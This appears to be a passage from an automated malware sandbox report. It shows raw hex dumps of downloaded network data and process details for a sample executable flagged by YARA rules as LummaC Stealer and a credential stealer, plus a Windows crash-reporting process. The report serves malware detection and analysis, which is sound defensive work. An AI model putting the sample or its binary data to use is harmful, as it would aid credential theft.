                                                                                                                                              2024-12-24 07:51:03 UTC1024INData Raw: c2 94 29 53 54 f9 01 29 4f 36 46 8d e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba
                                                                                                                                              Data Ascii: )ST)O6FR::|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07
                                                                                                                                              2024-12-24 07:51:03 UTC1749INData Raw: 36 6c d8 a0 d8 b8 71 63 33 36 6d da d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36
                                                                                                                                              Data Ascii: 6lqc36meBoU!m/od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.6
                                                                                                                                              2024-12-24 07:51:03 UTC16384INData Raw: f3 f4 e5 2c fa 8b d6 6e a0 f9 db f7 d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77
                                                                                                                                              Data Ascii: ,nJ7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw
                                                                                                                                              2024-12-24 07:51:03 UTC1024INData Raw: a7 8e 1e 9c 40 02 bb 31 29 24 25 52 1a 27 ce 34 4e 62 c1 bb bd 69 f3 73 33 69 41 bb a7 99 27 79 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2
                                                                                                                                              Data Ascii: @1)$%R'4Nbis3iA'y|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>
                                                                                                                                              2024-12-24 07:51:03 UTC16384INData Raw: f3 34 9e a7 37 ca 6c 39 b9 e9 d4 0d 8e 25 5a ee e8 d2 c7 6d e2 6e 1e ee e4 e6 ee a6 04 7f d3 d2 f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65
                                                                                                                                              Data Ascii: 47l9%ZmnzRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:1
                                                                                                                                              Start time:02:50:30
                                                                                                                                              Start date:24/12/2024
                                                                                                                                              Path:C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\tTGxYWtjG5.exe"
                                                                                                                                              Imagebase:0x9c0000
                                                                                                                                              File size:2'963'968 bytes
                                                                                                                                              MD5 hash:6E0E190CE94E8017D60243ED97725433
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1436505307.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1436238542.0000000000859000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:04:00:38
                                                                                                                                              Start date:24/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840
                                                                                                                                              Imagebase:0x6a0000
                                                                                                                                              File size:483'680 bytes
                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              No disassembly